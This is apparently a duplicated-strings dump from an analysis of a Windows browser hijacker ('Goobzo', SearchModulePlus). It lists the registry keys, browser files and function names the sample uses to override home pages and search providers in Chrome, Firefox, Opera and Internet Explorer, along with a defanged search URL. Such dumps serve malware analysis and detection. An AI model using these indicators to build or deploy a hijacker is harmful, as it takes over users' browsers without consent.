http\shell\open\command
http\shell\open\command
Software\Microsoft\Windows\CurrentVersion\App Paths
Software\Microsoft\Windows\CurrentVersion\App Paths
[Utils::SoftwareInfo::GetHttpOpenHandler]
[Utils::SoftwareInfo::GetHttpOpenHandler]
Utils::Registry::OpenKeyW
Utils::Registry::OpenKeyW
SOFTWARE\Microsoft\Windows\CurrentVersion\Group Policy
SOFTWARE\Microsoft\Windows\CurrentVersion\Group Policy
Could not create pipe. %%s
Could not create pipe. %%s
Could not allocate IPC memory. Requires size: %u
Could not allocate IPC memory. Requires size: %u
Event error. %%s
Event error. %%s
Could not create pipe event. %%s
Could not create pipe event. %%s
Pipe connecting error. %%s
Pipe connecting error. %%s
Error code: %u ('%s')
Error code: %u ('%s')
Not enough memory. Size: %s (%s)
Not enough memory. Size: %s (%s)
Could not create IPC event. %%s
Could not create IPC event. %%s
Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1)
Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1)
Content-Type: multipart/form-data; boundary=%s
Content-Type: multipart/form-data; boundary=%s
XXX
XXX
HTTP/1.1
HTTP/1.1
Content-Disposition: form-data; name="%s"
Content-Disposition: form-data; name="%s"
Software\Microsoft\Windows\CurrentVersion\Internet Settings
Software\Microsoft\Windows\CurrentVersion\Internet Settings
HTTP/1.0
HTTP/1.0
SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall
SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall
SYSTEM\CurrentControlSet\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}
SYSTEM\CurrentControlSet\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}
[SynchronousPipe::Read]
[SynchronousPipe::Read]
[SynchronousPipe::Write]
[SynchronousPipe::Write]
CChromeExtension::GetFileListInExtenstion
CChromeExtension::GetFileListInExtenstion
__MSG_
__MSG_
messages.json
messages.json
manifest.json
manifest.json
CHROME.EXE
CHROME.EXE
[Chrome::BrowserInfo::Query]
[Chrome::BrowserInfo::Query]
WebData
WebData
SHELL32.DLL
SHELL32.DLL
e\Application\chrome.exe
e\Application\chrome.exe
Google\Chrome
Google\Chrome
\resources.pak
\resources.pak
\Google\Chrome\Application\chrome.exe
\Google\Chrome\Application\chrome.exe
\Google\Chrome\Application\
\Google\Chrome\Application\
\Web Data
\Web Data
[SQLite::Implementation::AddProvider]
[SQLite::Implementation::AddProvider]
[SQLite::Implementation::GetProviderById]
[SQLite::Implementation::GetProviderById]
[SQLite::Implementation::GetFirstProviderId]
[SQLite::Implementation::GetFirstProviderId]
[SQLite::Implementation::GetProviderByKeyword]
[SQLite::Implementation::GetProviderByKeyword]
[SQLite::Implementation::GetProviderId]
[SQLite::Implementation::GetProviderId]
chrome-extension://
chrome-extension://
13050095043000000
13050095043000000
hXXp://api.searchpredict.com/api/?rqtype=ffplugin&siteID=8661&dbCode=1&command={searchTerms}
hXXp://api.searchpredict.com/api/?rqtype=ffplugin&siteID=8661&dbCode=1&command={searchTerms}
4BB42133-5533-4A0C-BF72-F1B8C8776A11
4BB42133-5533-4A0C-BF72-F1B8C8776A11
Checking
Checking
[Injection::Snapshot::Chrome::Settings::Dump]
[Injection::Snapshot::Chrome::Settings::Dump]
[Injection::Snapshot::Firefox::Settings::Dump]
[Injection::Snapshot::Firefox::Settings::Dump]
[Monitor::RestoreData::Controller::Build]
[Monitor::RestoreData::Controller::Build]
[Monitor::RestoreData::Controller::Build]
[Monitor::RestoreData::Controller::Build]
[Injection::Snapshot::Builder::BuildSettings]
[Injection::Snapshot::Builder::BuildSettings]
[Injection::Snapshot::Builder::BuildSettings]
[Injection::Snapshot::Builder::BuildSettings]
Injection::Snapshot::Parser::Parse
Injection::Snapshot::Parser::Parse
new
new
Injection::Snapshot::Parser::Parse
Injection::Snapshot::Parser::Parse
new
new
[Injection::Snapshot::Parser::Parse]
[Injection::Snapshot::Parser::Parse]
ReadStringNode
ReadStringNode
ReadStringNode
ReadStringNode
[Injection::Snapshot::Parser::Parse]
[Injection::Snapshot::Parser::Parse]
Chrome::BrowserSettings::Create
Chrome::BrowserSettings::Create
[Injection::Snapshot::Controller::IsChromeInstalled]
[Injection::Snapshot::Controller::IsChromeInstalled]
Firefox::BrowserSettings::Create
Firefox::BrowserSettings::Create
[Injection::Snapshot::Controller::IsFirefoxInstalled]
[Injection::Snapshot::Controller::IsFirefoxInstalled]
Firefox::BrowserSettings::RestoreState
Firefox::BrowserSettings::RestoreState
Chrome::BrowserSettings::RestoreState
Chrome::BrowserSettings::RestoreState
Argument.SystemConfig:
Argument.SystemConfig:
Argument.Config::User:
Argument.Config::User:
Argument.Config::General:
Argument.Config::General:
Chrome::BrowserSettings::PropagateState
Chrome::BrowserSettings::PropagateState
Firefox::BrowserSettings::PropagateState
Firefox::BrowserSettings::PropagateState
Argument.UserSid:
Argument.UserSid:
WatchmanKey::Users::SaveRestoreData
WatchmanKey::Users::SaveRestoreData
[WatchmanKey::GetEncryptionKey]
[WatchmanKey::GetEncryptionKey]
MachineKey::Generate
MachineKey::Generate
MachineKey::Create
MachineKey::Create
[WatchmanKey::LoadEncodedData]
[WatchmanKey::LoadEncodedData]
[WatchmanKey::CleanupKey]
[WatchmanKey::CleanupKey]
WatchmanKey::GetEncryptionKey
WatchmanKey::GetEncryptionKey
[WatchmanKey::SaveEncodedData]
[WatchmanKey::SaveEncodedData]
WatchmanKey::System::Open
WatchmanKey::System::Open
[WatchmanKey::System::LoadGeneralConfig]
[WatchmanKey::System::LoadGeneralConfig]
[WatchmanKey::System::SaveGeneralConfig]
[WatchmanKey::System::SaveGeneralConfig]
WatchmanKey::LoadEncodedData
WatchmanKey::LoadEncodedData
WatchmanKey::SaveEncodedData
WatchmanKey::SaveEncodedData
WatchmanKey::System::Ensure
WatchmanKey::System::Ensure
[WatchmanKey::System::SaveSystemConfig]
[WatchmanKey::System::SaveSystemConfig]
[WatchmanKey::System::LoadSystemConfig]
[WatchmanKey::System::LoadSystemConfig]
WatchmanKey::EnsureKey
WatchmanKey::EnsureKey
[WatchmanKey::Users::Ensure]
[WatchmanKey::Users::Ensure]
WatchmanKey::OpenKey
WatchmanKey::OpenKey
[WatchmanKey::Users::Open]
[WatchmanKey::Users::Open]
[WatchmanKey::Users::LoadConfiguration]
[WatchmanKey::Users::LoadConfiguration]
[WatchmanKey::Users::SaveConfiguration]
[WatchmanKey::Users::SaveConfiguration]
WatchmanKey::Users::Ensure
WatchmanKey::Users::Ensure
[WatchmanKey::Users::LoadRestoreData]
[WatchmanKey::Users::LoadRestoreData]
[WatchmanKey::Updater::SetLastTime]
[WatchmanKey::Updater::SetLastTime]
[WatchmanKey::Updater::GetBlackListHash]
[WatchmanKey::Updater::GetBlackListHash]
[WatchmanKey::Updater::SetBlackListHash]
[WatchmanKey::Updater::SetBlackListHash]
[WatchmanKey::Reporter::SetLastTime]
[WatchmanKey::Reporter::SetLastTime]
[WatchmanKey::Reporter::GetLastTime]
[WatchmanKey::Reporter::GetLastTime]
[WatchmanKey::TimeBomb::Uninstall]
[WatchmanKey::TimeBomb::Uninstall]
WatchmanKey::SystemKey::Open
WatchmanKey::SystemKey::Open
{CFBFAE00-17A6-11D0-99CB-00C04FD64497}
{CFBFAE00-17A6-11D0-99CB-00C04FD64497}
{7F4EFF06-7032-458e-AE16-1C1D8255C28A}
{7F4EFF06-7032-458e-AE16-1C1D8255C28A}
smod.xml
smod.xml
SearchModulePlus.crx
SearchModulePlus.crx
DATAMNGR.DLL
DATAMNGR.DLL
IEBHO.DLL
IEBHO.DLL
VC32.DLL
VC32.DLL
[Config::General::UrlSet::Copy]
[Config::General::UrlSet::Copy]
[Config::General::Chrome::Settings::Dump]
[Config::General::Chrome::Settings::Dump]
[Config::General::Chrome::ValueSet::Copy]
[Config::General::Chrome::ValueSet::Copy]
[Config::General::Chrome::Settings::Copy]
[Config::General::Chrome::Settings::Copy]
[Config::General::Firefox::Settings::Copy]
[Config::General::Firefox::Settings::Copy]
[Config::General::Firefox::Settings::Dump]
[Config::General::Firefox::Settings::Dump]
[Config::General::Opera::Settings::Dump]
[Config::General::Opera::Settings::Dump]
[Config::General::Firefox::ValueSet::Copy]
[Config::General::Firefox::ValueSet::Copy]
[Config::General::Opera::Settings::Copy]
[Config::General::Opera::Settings::Copy]
Config::General::Parser::ParseUrlSet
Config::General::Parser::ParseUrlSet
Config::General::Parser::ParseFirefoxSettings
Config::General::Parser::ParseFirefoxSettings
Config::General::Parser::ParseChromeSettings
Config::General::Parser::ParseChromeSettings
Config::General::Parser::ParseOperaSettings
Config::General::Parser::ParseOperaSettings
ReadStringNode
ReadStringNode
ReadStringNode
ReadStringNode
eReadStringNode
eReadStringNode
ReadStringNode
ReadStringNode
ReadStringNode
ReadStringNode
[Config::General::Parser::ParseChromeSettings]
[Config::General::Parser::ParseChromeSettings]
Config::General::Parser::ParseChromeValueSets
Config::General::Parser::ParseChromeValueSets
MissedElement
MissedElement
ReadStringNode
ReadStringNode
[Config::General::Parser::ParseChromeValueSets]
[Config::General::Parser::ParseChromeValueSets]
ReadStringNode
ReadStringNode
ReadStringNode
ReadStringNode
[Config::General::Parser::ParseFirefoxSettings]
[Config::General::Parser::ParseFirefoxSettings]
ReadStringNode
ReadStringNode
Config::General::Parser::ParseFirefoxValueSets
Config::General::Parser::ParseFirefoxValueSets
MissedElement
MissedElement
ReadOptionalStringNode
ReadOptionalStringNode
[Config::General::Parser::ParseFirefoxValueSets]
[Config::General::Parser::ParseFirefoxValueSets]
ReadOptionalStringNode
ReadOptionalStringNode
lReadOptionalStringNode
lReadOptionalStringNode
MissedElement
MissedElement
[Config::General::Parser::ParseUrlSet]
[Config::General::Parser::ParseUrlSet]
ReadStringNode
ReadStringNode
ReadStringNode
ReadStringNode
yReadStringNode
yReadStringNode
ReadStringNode
ReadStringNode
[Config::General::Parser::ParseOperaSettings]
[Config::General::Parser::ParseOperaSettings]
ReadStringNode
ReadStringNode
MissedElement
MissedElement
ReadStringNode
ReadStringNode
[Config::General::Builder::Build]
[Config::General::Builder::Build]
[Config::General::Builder::Build]
[Config::General::Builder::Build]
[Config::General::Builder::Build]
[Config::General::Builder::Build]
We couldn't find the URL Set section... probably an old configuration!
We couldn't find the URL Set section... probably an old configuration!
WatchmanKey::System::LoadGeneralConfig
WatchmanKey::System::LoadGeneralConfig
WatchmanKey::System::SaveGeneralConfig
WatchmanKey::System::SaveGeneralConfig
2.1.0.7
2.1.0.7
2.0.0.0
2.0.0.0
ReadOptionalStringNode
ReadOptionalStringNode
ReadStringNode
ReadStringNode
ReadStringNode
ReadStringNode
ReadBooleanNode
ReadBooleanNode
ReadBooleanNode
ReadBooleanNode
Could not find URL Set in configuration. Probably older configuration.
Could not find URL Set in configuration. Probably older configuration.
ReadBooleanNode
ReadBooleanNode
WatchmanKey::System::LoadSystemConfig
WatchmanKey::System::LoadSystemConfig
WatchmanKey::System::SaveSystemConfig
WatchmanKey::System::SaveSystemConfig
[Config::User::Chrome::Settings::Copy]
[Config::User::Chrome::Settings::Copy]
[Config::User::Firefox::Settings::Copy]
[Config::User::Firefox::Settings::Copy]
Config::User::Parser::ParseChromeSettings
Config::User::Parser::ParseChromeSettings
Config::User::Parser::ParseFirefoxSettings
Config::User::Parser::ParseFirefoxSettings
[Config::User::Parser::ParseChromeSettings]
[Config::User::Parser::ParseChromeSettings]
[Config::User::Parser::ParseFirefoxSettings]
[Config::User::Parser::ParseFirefoxSettings]
[Config::User::Builder::BuildFirefoxSettings]
[Config::User::Builder::BuildFirefoxSettings]
[Config::User::Builder::BuildChromeSettings]
[Config::User::Builder::BuildChromeSettings]
WatchmanKey::User::LoadConfiguration
WatchmanKey::User::LoadConfiguration
WatchmanKey::User::SaveConfiguration
WatchmanKey::User::SaveConfiguration
Mozilla\Firefox\
Mozilla\Firefox\
profiles.ini
profiles.ini
prefs.js
prefs.js
[Firefox::InstallInfo::ReadProfiles]
[Firefox::InstallInfo::ReadProfiles]
[Firefox::InstallInfo::QueryProfiles]
[Firefox::InstallInfo::QueryProfiles]
[Firefox::InstallInfo::ParseProfiles]
[Firefox::InstallInfo::ParseProfiles]
Firefox::InstallInfo::ReadProfiles
Firefox::InstallInfo::ReadProfiles
Firefox::InstallInfo::ParseProfiles
Firefox::InstallInfo::ParseProfiles
[Firefox::InstallInfo::Query]
[Firefox::InstallInfo::Query]
No profiles found! Maybe - first start of Firefox?
No profiles found! Maybe - first start of Firefox?
[Firefox::BrowserSettings::MakeSnapshot]
[Firefox::BrowserSettings::MakeSnapshot]
[Firefox::BrowserSettings::RestoreState]
[Firefox::BrowserSettings::RestoreState]
[Firefox::BrowserSettings::PropagateState]
[Firefox::BrowserSettings::PropagateState]
Software\Microsoft\Windows\CurrentVersion\Ext\Settings
Software\Microsoft\Windows\CurrentVersion\Ext\Settings
Software\Microsoft\Windows\CurrentVersion\Explorer\Browser Helper Objects
Software\Microsoft\Windows\CurrentVersion\Explorer\Browser Helper Objects
Software\Microsoft\Internet Explorer\AboutURLs
Software\Microsoft\Internet Explorer\AboutURLs
TopResultURLFallback
TopResultURLFallback
SuggestionURL
SuggestionURL
FaviconURL
FaviconURL
IEXPLORE.EXE
IEXPLORE.EXE
Failed to call enum URL's. Error:
Failed to call enum URL's. Error:
Software\Microsoft\Internet Explorer\URLSearchHooks
Software\Microsoft\Internet Explorer\URLSearchHooks
[Explorer::BrowserSettings::SetMainKeyValues]
[Explorer::BrowserSettings::SetMainKeyValues]
[Explorer::BrowserSettings::SetTabbedBrowsingKeyValues]
[Explorer::BrowserSettings::SetTabbedBrowsingKeyValues]
[Explorer::BrowserSettings::SetSearchScopeKeyValues]
[Explorer::BrowserSettings::SetSearchScopeKeyValues]
[Explorer::BrowserSettings::SetAboutURLsKeyValues]
[Explorer::BrowserSettings::SetAboutURLsKeyValues]
Result.SearchScope:
Result.SearchScope:
Argument.SearchScopeToSearch:
Argument.SearchScopeToSearch:
Argument.Parent:
Argument.Parent:
[Explorer::BrowserSettings::DeleteKey]
[Explorer::BrowserSettings::DeleteKey]
Argument.Subkey:
Argument.Subkey:
VirtualSpeedbitSearchScopeKey::EnsureKeyW
VirtualSpeedbitSearchScopeKey::EnsureKeyW
Key deleted:
Key deleted:
TopResultURL
TopResultURL
FaviconURLFallback
FaviconURLFallback
SuggestionsURL
SuggestionsURL
SuggestionsURLFallback
SuggestionsURLFallback
\Opera\launcher.exe
\Opera\launcher.exe
Opera Software\Opera Stable\
Opera Software\Opera Stable\
\Opera\
\Opera\
\opera.pak
\opera.pak
Web Data
Web Data
\resources\default_partner_content.json
\resources\default_partner_content.json
KERNELBASE.DLL
KERNELBASE.DLL
Chrome::InstallInfo::Get
Chrome::InstallInfo::Get
[Chrome::BrowserSettings::OpenConfigFiles]
[Chrome::BrowserSettings::OpenConfigFiles]
SQLite::WebDataDB::Create
SQLite::WebDataDB::Create
Argument.HomePageUrl:
Argument.HomePageUrl:
[Chrome::BrowserSettings::SetHomePagePreferences]
[Chrome::BrowserSettings::SetHomePagePreferences]
[Chrome::BrowserSettings::SetDefaultProviderPreferences]
[Chrome::BrowserSettings::SetDefaultProviderPreferences]
Argument.HomePageIsNewTabPage:
Argument.HomePageIsNewTabPage:
Argument.DefaultProviderKeyWord:
Argument.DefaultProviderKeyWord:
Argument.DefaultProviderId:
Argument.DefaultProviderId:
Argument.DefaultProviderEncoding:
Argument.DefaultProviderEncoding:
Argument.DefaultProviderName:
Argument.DefaultProviderName:
Argument.DefaultProviderIconUrl:
Argument.DefaultProviderIconUrl:
Argument.DefaultProviderSearchUrl:
Argument.DefaultProviderSearchUrl:
[Chrome::BrowserSettings::SetRestoreOnStartupPreferences]
[Chrome::BrowserSettings::SetRestoreOnStartupPreferences]
Argument.DefaultProviderSuggestUrl:
Argument.DefaultProviderSuggestUrl:
Argument.UrlsToRestoreOnStartup:
Argument.UrlsToRestoreOnStartup:
Argument.RestoreOnStartup:
Argument.RestoreOnStartup:
Argument.KeywordToSearch:
Argument.KeywordToSearch:
[Chrome::BrowserSettings::GetSearchProviderId]
[Chrome::BrowserSettings::GetSearchProviderId]
SQLite::WebDataDB::GetProviderById
SQLite::WebDataDB::GetProviderById
SQLite::WebDataDB::GetFirstProviderId
SQLite::WebDataDB::GetFirstProviderId
[Chrome::BrowserSettings::EnsureSearchProvider]
[Chrome::BrowserSettings::EnsureSearchProvider]
Result.ProviderId:
Result.ProviderId:
[Chrome::BrowserSettings::DeleteSearchProvider]
[Chrome::BrowserSettings::DeleteSearchProvider]
SQLite::WebDataDB::Values::Create
SQLite::WebDataDB::Values::Create
[Chrome::BrowserSettings::MakeSnapshot]
[Chrome::BrowserSettings::MakeSnapshot]
[Chrome::BrowserSettings::RestoreState]
[Chrome::BrowserSettings::RestoreState]
Chrome::BrowserSettings::DeleteSearchProvider
Chrome::BrowserSettings::DeleteSearchProvider
Chrome::BrowserSettings::OpenConfigFiles
Chrome::BrowserSettings::OpenConfigFiles
SQLite::WebDataDB::SetDefaultProvider
SQLite::WebDataDB::SetDefaultProvider
[Chrome::BrowserSettings::PropagateState]
[Chrome::BrowserSettings::PropagateState]
Chrome::BrowserSettings::EnsureSearchProvider
Chrome::BrowserSettings::EnsureSearchProvider
%Program Files%\Common Files\Goobzo\GBUpdatePlus\smu.exe
%Program Files%\Common Files\Goobzo\GBUpdatePlus\smu.exe
SearchProtocolHost.exe_3464:
SearchFilterHost.exe_3964: